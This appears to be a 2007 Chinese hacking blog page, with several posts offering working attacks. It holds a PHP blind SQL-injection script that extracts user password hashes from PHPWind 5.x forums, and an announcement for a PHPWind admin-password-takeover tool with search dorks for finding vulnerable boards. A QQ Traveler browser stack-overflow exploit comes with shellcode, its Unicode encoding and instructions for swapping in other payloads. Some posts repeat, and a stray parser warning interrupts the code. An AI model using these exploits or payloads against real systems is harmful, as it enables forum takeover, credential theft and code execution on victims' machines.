最近好忙啊
作者:天晴无名氏 日期:2007-04-11 11:45
phpwind5.X Exp php源码版
作者:天晴无名氏 日期:2007-04-09 01:52
CODE:<?php
print_r(
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/content/d/a/n/danchleo/html/popphennetru/include/common.php on line 700
"
+------------------------------------------------------------------+
Exploit For Phpwind 5.X Version
BY Loveshell
Just For Fun :)
+------------------------------------------------------------------+
\");
ini_set(\"max_execution_time\",0);
error_reporting(7);
$bbspath=\"$argv[2]\";
$server=\"$argv[1]\";
$cookie='1ae40_lastfid=0; 1ae40_ol_offset=776; 1ae40_ck_info=%2F%09.72m.net; 1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D; 1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F;
$useragent=\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";
$uid=intval($argv[3])>0 ? intval($argv[3]):1;
echo \"
#Logging ........\";
if(islogin()) echo \"Login Ok!
\";
else die(\"Not Login! Check Your Cookie and Useragent!
\");
echo \"#Testing ........\";
if(test()) echo \"Vul!
\";
else die(\"Not Vul\");
$hashtable='0123456789abcdef';
$count=0;
echo \"#Cracking
\";
for($i=1;$i<=16;$i++){
echo \"第 $i 位:\";
$subpass=crack($i+8);
$password=$password.$subpass;
echo \"$subpass
\";
}
echo \"Password: $password\";
echo \"
Good Luck $count Times
\";
function send($cmd,$path)
{
global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;
$path=$bbspath.\"$path\";
$message = \"POST \".$path.\" HTTP/1.1
\";
$message .= \"Accept: */*
\";
$message .= \"Accept-Language: zh-cn
\";
$message .= \"Referer: http://\".$server.$path.\"
\";
$message .= \"Content-Type: application/x-www-form-urlencoded
\";
$message .= \"User-Agent: \".$useragent.\"
\";
$message .= \"Host: \".$server.\"
\";
$message .= \"Content-length: \".strlen($cmd).\"
\";
$message .= \"Connection: Keep-Alive
\";
$message .= \"Cookie: \".$cookie.\"
\";
$message .= \"
\";
$message .= $cmd.\"
\";
$count=$count+1;
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = \"<pre>\";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .=\"</pre>\";
if($debug) {echo $cmd;echo $resp;}
// echo $resp;
return $resp;
}
function sqlject($sql){
global $uid;
$data='action=pubmsg&readmsg=0)';
$data=$data.\" union select BENCHMARK(1000000,md5(12345)) from pw_members where uid=$uid and $sql\".'/*';
$echo=send($data,'message.php');
preg_match(\"/Total (.*)(/i\",$echo,$matches);
if($matches[1]>2) return 1;
else return 0;
}
function test(){
global $uid;
$data='action=pubmsg&readmsg=0)';
$echo=send($data,'message.php');
if(strpos($echo,'MySQL Server Error')) return 1;
else return 0;
}
function islogin(){
global $uid;
$data='action=pubmsg&readmsg=0)';
$echo=send($data,'message.php');
if(strpos($echo,'login.php\"')) return 0;
else return 1;
}
function crack($i){
global $hashtable;
$sql=\"mid(password,$i,1)>0x\".bin2hex('8');
if(sqlject($sql)){
$a=8;
$b=15;}
else {
$a=0;
$b=8;
}
for($tmp=$a;$tmp<=$b;$tmp++){
$sql=\"mid(password,$i,1)=0x\".bin2hex($hashtable[$tmp]);
if(sqlject($sql)) return $hashtable[$tmp];
}
crack($i);
}
?>
Vista+Google=严重安全漏洞
作者:天晴无名氏 日期:2007-04-09 01:51
一个ANI漏洞,逼迫微软提前一周发布补丁。昨天,记者从瑞星监测网获悉WindowsVista系统再现软档:Google(谷歌)公司最新发布的Google拼音输入法1.0版可能导致Vista系统出现漏洞,而且即便是普通玩家也能轻易通过该漏洞获得系统管理权限,而黑客更可以利用该漏洞对电脑进行多种危险操作。
“这个安全漏洞好比是门和门框之间出现的缝隙,微软和Google都有一定的责任。”瑞星安全专家表示,早在Windows2000系统刚刚问世的时候,就曾因为输入法漏洞而出现过类似问题,后来微软还发布了专门的补丁程序。“目前看来,Vista系统在防止输入法漏洞方面并没有得到改善,仍然十分容易遭到某些安全性能低下的输入法的影响。”
据悉,黑客可以利用该漏洞在无管理员密码的情况下登录系统,获得管理员权限,从而完全控制系统。黑客可以删除文件、格式化硬盘、安装木马……使Vista的安全机制行同虚设。Google输入法刚刚发布,网上就出现了利用该漏洞攻击Vista系统的“教程”,即使是不懂电脑的人也可以按照“教程”所提供的方法取得管理员权限。
昨天,记者登陆PChome等专业下载网站,发现Google输入法的使用范围不如搜狗、紫光广泛,但还是有不少发烧友争相下载使用。据悉,目前只测试出Google输入法有问题,但不排除在Vista系统上安装其它输入法软件也会形成这类漏洞。瑞星安全专家表示,从前段时间大家所关注的ANI漏洞到此次发现的输入法漏洞,表明WindowsVista系统在某些方面延续了Windows2000、WindowsXP等“前辈”的弱点,因此其宣称的“划时代”的安全性能实在令人不敢苟同。
【Exploits】PHPWind 5.x Exploits
作者:天晴无名氏 日期:2007-04-07 13:04
| PHPWind 5.x Exploits |
| |
| Powered by HamFast V1.12 20070101 |
| |
---------------------------------------------------------------/
ATTANTION: Only do this bug test on your board!//仅仅用来测试你的论坛安全!
Don't attack any other site!//不要用于攻击其他网站
-----------------------------------------------------------------
BUGS:
Here is a very dangerous bug for PHPWind 5.x!!!! You can change
any user's password or register as a new user.
Ofcouse, you can change the admin's password, then the board will
be under control.
Maybe 80% of PHPWind boards have this bug.
This tools can exploit PHPWind 5.0.1 AND PHPWind 5.3.
----------------------------------------------------------------
Board Search:
----------------------------------------------------------------
http://www.baidu.com/s?tn=baidu& ... PWind+v5.0&ct=0
http://www.google.com/search?new ... red+by+phpwind+v5.0
下载地址:http://bbs.hackbase.com/viewthread.php?tid=3106742&page=1#pid4620831
| |
| Powered by HamFast V1.12 20070101 |
| |
---------------------------------------------------------------/
ATTANTION: Only do this bug test on your board!//仅仅用来测试你的论坛安全!
Don't attack any other site!//不要用于攻击其他网站
-----------------------------------------------------------------
BUGS:
Here is a very dangerous bug for PHPWind 5.x!!!! You can change
any user's password or register as a new user.
Ofcouse, you can change the admin's password, then the board will
be under control.
Maybe 80% of PHPWind boards have this bug.
This tools can exploit PHPWind 5.0.1 AND PHPWind 5.3.
----------------------------------------------------------------
Board Search:
----------------------------------------------------------------
http://www.baidu.com/s?tn=baidu& ... PWind+v5.0&ct=0
http://www.google.com/search?new ... red+by+phpwind+v5.0
下载地址:http://bbs.hackbase.com/viewthread.php?tid=3106742&page=1#pid4620831
Google 也出拼音了。
作者:天晴无名氏 日期:2007-04-04 13:47
我现在用的是搜狗拼音 感觉非常不错 呵呵
想不到google也出拼音输入法了。 看看它的功能
智能组句:选词准确率高,能聪明地理解您的意图,短句长句都合适。
流行词汇:整合互联网上的流行词汇、热门搜索一网打尽,词组丰富强大。
网络同步:您可以将使用习惯和个人字典同步在 Google 帐号,一个跟您走的个性化输入法。
一键搜索:拼写输入的同时轻点一键即可快捷搜索。输入法结合搜索框一举两得。
英文提示:打英文时只需输入前几个字母,输入法自动提示您可能要找的单字。
网络同步字库,字库是不错呵呵。第一感觉比微软的拼音感觉要好 不知道有没比搜狗好呵呵
http://tools.google.com/pinyin/index.html
标签: 谷歌拼音输入法
QQ Traveler漏洞分析与利用(0day)
作者:天晴无名氏 日期:2007-04-02 12:43
failwest shineast
漏洞概述
腾讯TT(QQ Traveler)是一款多页面浏览器,具有亲切、友好的用户界面,提供多种皮肤供用户根据个人喜好使用,另外TT更是新增了多项人性化的特色功能,使上网冲浪变的更加轻松自如、省时省力。智能屏蔽一键开通, 最近浏览一键找回,多页面一键打开,浏览记录一键清除,多种皮肤随心变换,多线程高速旋风下载。
腾讯TT在处理地址栏输入的URL时,存在栈溢出漏洞。虽然其处理过程中对URL进行了Unicode编码,但是经过精心的构造,还是可以构造出可见的 Unicode字符串,来控制EIP指令寄存器,并构造支持Unicode的shellcode。这一点已经得到我们的证实!
漏洞分析
构造的URL如下:
http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffggggggggggggggggggggggggggg ... hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh蠀緑橨㠊栞襣俑㉨酴謌跴�ҷ�뭦㈳桓獵牥㍔擒媋謰ో䦋謜謉ࡩ㶭੪Ḹյユ悕䖋謼Ռ词⁙�S譇무ྙھ쐺ࡴ쫁̇䛐吻ᰤ�妋̤曝㲋譻᱙�Ⰳ閻ꭟ慗樽㠊甞㎩叛睨獥桴慦汩쒋偓卐埿叼埿
――――――――――――――――――――――――――――――――
其中蠀緑是7DD1 8800这个十六进制的unicode码,这个地址指向Window XP的shell32.dll中的某个JMP ESP指令的地址;
剩下的蓝色部分是一段支持unicode的shellcode,这段shellcode是failwest大侠所作,可以自动加载user32.dll动态链接库,并弹出对话框,显示“failwest”。
因此,如果把上面的url填入腾讯TT的地址栏,并执行了shellcode,即弹出了对话框,那么就可以说明这个漏洞的存在
因此可以证明这个漏洞的存在,下面我们用ollyDBG来跟踪分析一下:
0053AE1D |. 8B35 30825600 MOV ESI,DWORD PTR DS:[] ; msvcrt.wcslen
0053AE23 |. 55 PUSH EBP ; /s 指向URL的堆地址
0053AE24 |. FFD6 CALL ESI ; wcslen 进行长度URL的计算
0053AE26 |. 83C4 04 ADD ESP,4
0053AE29 |. 85C0 TEST EAX,EAX ;EAX此时是URL的长度
0053AE2B |. 0F84 3B010000 JE TTravele.0053AF6C ;如果URL的长度为0,则退出
0053AE31 |. 68 D0CA5A00 PUSH TTravele.005ACAD0 ; /wstr2 = "about:blank"
0053AE36 |. 55 PUSH EBP ; |wstr1
0053AE37 |. FF15 38825600 CALL DWORD PTR DS:[] ; \_wcsicmp 让URL与"about:blank"比较
0053AE3D |. 83C4 08 ADD ESP,8
0053AE40 |. 85C0 TEST EAX,EAX ;如果URL和"about:blank"相同
0053AE42 |. 0F84 24010000 JE TTravele.0053AF6C ;就退出
0053AE48 |. A1 E4125C00 MOV EAX,DWORD PTR DS:[5C12E4]
0053AE4D |. 33DB XOR EBX,EBX
0053AE4F |. 85C0 TEST EAX,EAX
0053AE51 |. 76 32 JBE SHORT TTravele.0053AE85 ;跳0053AE85
0053AE53 |. BF 00705B00 MOV EDI,TTravele.005B7000
0053AE58 |> 55 /PUSH EBP ; /wstr2
0053AE59 |. 57 |PUSH EDI ; |wstr1
0053AE5A |. FF15 38825600 |CALL DWORD PTR DS:[] ; \_wcsicmp
0053AE60 |. 83C4 08 |ADD ESP,8
0053AE63 |. 85C0 |TEST EAX,EAX
0053AE65 |. 74 12 |JE SHORT TTravele.0053AE79
0053AE67 |. A1 E4125C00 |MOV EAX,DWORD PTR DS:[5C12E4]
0053AE6C |. 43 |INC EBX
0053AE6D |. 81C7 4A100000 |ADD EDI,104A
0053AE73 |. 3BD8 |CMP EBX,EAX
0053AE75 |.^72 E1 JB SHORT TTravele.0053AE58
0053AE77 |. EB 0C JMP SHORT TTravele.0053AE85
0053AE79 |> 3B1D E4125C00 CMP EBX,DWORD PTR DS:[5C12E4]
0053AE7F |. 0F82 E7000000 JB TTravele.0053AF6C
0053AE85 |> 8B1D 2C825600 MOV EBX,DWORD PTR DS:[] ; msvcrt.wcscpy
0053AE8B |. 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
0053AE8F |. 55 PUSH EBP ; /src指向URL的堆地址
0053AE90 |. 50 PUSH EAX ; |dest指向栈帧中的一个栈地址
0053AE91 |. FFD3 CALL EBX ; wcscpy 复制URL到栈中
0053AE93 |. 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
0053AE97 |. 51 PUSH ECX
0053AE98 |. FFD6 CALL ESI
通过上面的分析,可以看出程序仅判断了地址栏输入的URL的长度是否为0,但是没有对URL长度的上限进行判断。这是导致最后栈溢出的根本原因!
那么我们只要算好地址,正好淹没了函数的返回地址即可,并在返回地址后紧跟着我们编制好的支持unicode的shellcode,也就是说我们玩的是JMP ESP这种经典的栈溢出跳shellcode的方法!
漏洞利用
作为演示,这里仅利用这个漏洞来弹出一个对话框,shellcode作者是failwest。
"x68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8B"
"xF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53x68"
"x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49"
"x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95xFF"
"x57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20"
"x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3AxC4"
"x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4"
"x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2C"
"xBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDBx53"
"x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50x53"
"xFFx57xFCx53xFFx57xF8";
写成unicode的形式如下:(每两个字节进行首字节与尾字节颠倒即可)
%u6A68%u380A%u681E%u8963%u4FD1%u3268%u9174%u8B0C%u8DF4%uF47E%uDB33%u04B7%uE32B%uBB66%u3233%u6853%u7375%u7265%u3354%u64D2%u5A8B%u8B30%u0C4B%u498B%u8B1C%u8B09%u0869%u3DAD%u0A6A%u1E38%u0575%uFF95%uF857%u6095%u458B%u8B3C%u054C%u0378%u8BCD%u2059%uDD03%uFF33%u8B47%uBB34%uF503%u0F99%u06BE%uC43A%u0874%uCAC1%u0307%u46D0%uF1EB%u543B%u1C24%uE475%u598B%u0324%u66DD%u3C8B%u8B7B%u1C59%uDD03%u2C03%u95BB%uAB5F%u6157%u6A3D%u380A%u751E%u33A9%u53DB%u7768%u7365%u6874%u6166%u6C69%uC48B%u5053%u5350%u57FF%u53FC%u57FF
从shellcode到unicode的转换,我已经写好了工具,运行一下那个程序,就可以把同目录下的sc.txt(不含“x”的shellcode字符文件)转换成unicode的形式,生成unicode.txt文件!
如要进行其他攻击,请先写好支持Unicode的shellcode,然后用我的工具,转换成unicode形式,并把unicode形式的 shellcode追加到上面的URL中蠀緑后即可。具体支持unicode 的shellcode的编写,请参考以下链接:
Unicode编码表:
http://www.wiki.cn/wiki/Unicode%E7%BC%96%E7%A0%81%E8%A1%A8/0000-0FFF
Unicode shellcode:
http://arhiva.elitesecurity.org/t80431-Unicode-shellcode
《Creating Arbitrary Shellcode In Unicode Expanded Strings》
http://www.nextgenss.com/papers/unicodebo.pdf
漏洞概述
腾讯TT(QQ Traveler)是一款多页面浏览器,具有亲切、友好的用户界面,提供多种皮肤供用户根据个人喜好使用,另外TT更是新增了多项人性化的特色功能,使上网冲浪变的更加轻松自如、省时省力。智能屏蔽一键开通, 最近浏览一键找回,多页面一键打开,浏览记录一键清除,多种皮肤随心变换,多线程高速旋风下载。
腾讯TT在处理地址栏输入的URL时,存在栈溢出漏洞。虽然其处理过程中对URL进行了Unicode编码,但是经过精心的构造,还是可以构造出可见的 Unicode字符串,来控制EIP指令寄存器,并构造支持Unicode的shellcode。这一点已经得到我们的证实!
漏洞分析
构造的URL如下:
http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeefffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffggggggggggggggggggggggggggg ... hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh蠀緑橨㠊栞襣俑㉨酴謌跴�ҷ�뭦㈳桓獵牥㍔擒媋謰ో䦋謜謉ࡩ㶭੪Ḹյユ悕䖋謼Ռ词⁙�S譇무ྙھ쐺ࡴ쫁̇䛐吻ᰤ�妋̤曝㲋譻᱙�Ⰳ閻ꭟ慗樽㠊甞㎩叛睨獥桴慦汩쒋偓卐埿叼埿
――――――――――――――――――――――――――――――――
其中蠀緑是7DD1 8800这个十六进制的unicode码,这个地址指向Window XP的shell32.dll中的某个JMP ESP指令的地址;
剩下的蓝色部分是一段支持unicode的shellcode,这段shellcode是failwest大侠所作,可以自动加载user32.dll动态链接库,并弹出对话框,显示“failwest”。
因此,如果把上面的url填入腾讯TT的地址栏,并执行了shellcode,即弹出了对话框,那么就可以说明这个漏洞的存在
因此可以证明这个漏洞的存在,下面我们用ollyDBG来跟踪分析一下:
0053AE1D |. 8B35 30825600 MOV ESI,DWORD PTR DS:[] ; msvcrt.wcslen
0053AE23 |. 55 PUSH EBP ; /s 指向URL的堆地址
0053AE24 |. FFD6 CALL ESI ; wcslen 进行长度URL的计算
0053AE26 |. 83C4 04 ADD ESP,4
0053AE29 |. 85C0 TEST EAX,EAX ;EAX此时是URL的长度
0053AE2B |. 0F84 3B010000 JE TTravele.0053AF6C ;如果URL的长度为0,则退出
0053AE31 |. 68 D0CA5A00 PUSH TTravele.005ACAD0 ; /wstr2 = "about:blank"
0053AE36 |. 55 PUSH EBP ; |wstr1
0053AE37 |. FF15 38825600 CALL DWORD PTR DS:[] ; \_wcsicmp 让URL与"about:blank"比较
0053AE3D |. 83C4 08 ADD ESP,8
0053AE40 |. 85C0 TEST EAX,EAX ;如果URL和"about:blank"相同
0053AE42 |. 0F84 24010000 JE TTravele.0053AF6C ;就退出
0053AE48 |. A1 E4125C00 MOV EAX,DWORD PTR DS:[5C12E4]
0053AE4D |. 33DB XOR EBX,EBX
0053AE4F |. 85C0 TEST EAX,EAX
0053AE51 |. 76 32 JBE SHORT TTravele.0053AE85 ;跳0053AE85
0053AE53 |. BF 00705B00 MOV EDI,TTravele.005B7000
0053AE58 |> 55 /PUSH EBP ; /wstr2
0053AE59 |. 57 |PUSH EDI ; |wstr1
0053AE5A |. FF15 38825600 |CALL DWORD PTR DS:[] ; \_wcsicmp
0053AE60 |. 83C4 08 |ADD ESP,8
0053AE63 |. 85C0 |TEST EAX,EAX
0053AE65 |. 74 12 |JE SHORT TTravele.0053AE79
0053AE67 |. A1 E4125C00 |MOV EAX,DWORD PTR DS:[5C12E4]
0053AE6C |. 43 |INC EBX
0053AE6D |. 81C7 4A100000 |ADD EDI,104A
0053AE73 |. 3BD8 |CMP EBX,EAX
0053AE75 |.^72 E1 JB SHORT TTravele.0053AE58
0053AE77 |. EB 0C JMP SHORT TTravele.0053AE85
0053AE79 |> 3B1D E4125C00 CMP EBX,DWORD PTR DS:[5C12E4]
0053AE7F |. 0F82 E7000000 JB TTravele.0053AF6C
0053AE85 |> 8B1D 2C825600 MOV EBX,DWORD PTR DS:[] ; msvcrt.wcscpy
0053AE8B |. 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
0053AE8F |. 55 PUSH EBP ; /src指向URL的堆地址
0053AE90 |. 50 PUSH EAX ; |dest指向栈帧中的一个栈地址
0053AE91 |. FFD3 CALL EBX ; wcscpy 复制URL到栈中
0053AE93 |. 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
0053AE97 |. 51 PUSH ECX
0053AE98 |. FFD6 CALL ESI
通过上面的分析,可以看出程序仅判断了地址栏输入的URL的长度是否为0,但是没有对URL长度的上限进行判断。这是导致最后栈溢出的根本原因!
那么我们只要算好地址,正好淹没了函数的返回地址即可,并在返回地址后紧跟着我们编制好的支持unicode的shellcode,也就是说我们玩的是JMP ESP这种经典的栈溢出跳shellcode的方法!
漏洞利用
作为演示,这里仅利用这个漏洞来弹出一个对话框,shellcode作者是failwest。
"x68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8B"
"xF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53x68"
"x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49"
"x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95xFF"
"x57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20"
"x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3AxC4"
"x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4"
"x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2C"
"xBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDBx53"
"x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50x53"
"xFFx57xFCx53xFFx57xF8";
写成unicode的形式如下:(每两个字节进行首字节与尾字节颠倒即可)
%u6A68%u380A%u681E%u8963%u4FD1%u3268%u9174%u8B0C%u8DF4%uF47E%uDB33%u04B7%uE32B%uBB66%u3233%u6853%u7375%u7265%u3354%u64D2%u5A8B%u8B30%u0C4B%u498B%u8B1C%u8B09%u0869%u3DAD%u0A6A%u1E38%u0575%uFF95%uF857%u6095%u458B%u8B3C%u054C%u0378%u8BCD%u2059%uDD03%uFF33%u8B47%uBB34%uF503%u0F99%u06BE%uC43A%u0874%uCAC1%u0307%u46D0%uF1EB%u543B%u1C24%uE475%u598B%u0324%u66DD%u3C8B%u8B7B%u1C59%uDD03%u2C03%u95BB%uAB5F%u6157%u6A3D%u380A%u751E%u33A9%u53DB%u7768%u7365%u6874%u6166%u6C69%uC48B%u5053%u5350%u57FF%u53FC%u57FF
从shellcode到unicode的转换,我已经写好了工具,运行一下那个程序,就可以把同目录下的sc.txt(不含“x”的shellcode字符文件)转换成unicode的形式,生成unicode.txt文件!
如要进行其他攻击,请先写好支持Unicode的shellcode,然后用我的工具,转换成unicode形式,并把unicode形式的 shellcode追加到上面的URL中蠀緑后即可。具体支持unicode 的shellcode的编写,请参考以下链接:
Unicode编码表:
http://www.wiki.cn/wiki/Unicode%E7%BC%96%E7%A0%81%E8%A1%A8/0000-0FFF
Unicode shellcode:
http://arhiva.elitesecurity.org/t80431-Unicode-shellcode
《Creating Arbitrary Shellcode In Unicode Expanded Strings》
http://www.nextgenss.com/papers/unicodebo.pdf
2007最新IE 0day T4nk重新火炮网马生成器1.0
作者:天晴无名氏 日期:2007-03-31 14:27
Microsoft Windows Cursor And Icon ANI Format Handling Remote Code Execution Vulnerability
Bugtraq ID: 23194
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2007-1765
Remote: Yes
Local: No
Published: Mar 29 2007 12:00AM
Updated: Mar 30 2007 10:23PM
Credit: McAfee AVERT is credited with the discovery of this issue.
Vulnerable: Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows Vista December CTP
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business
Microsoft Windows Vista beta 2
Microsoft Windows Vista Beta 1
Microsoft Windows Vista Beta
Microsoft Windows Vista 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Mail 0
Microsoft Windows 2000 Server Japanese Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server
+ Avaya S8100 Media Servers
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
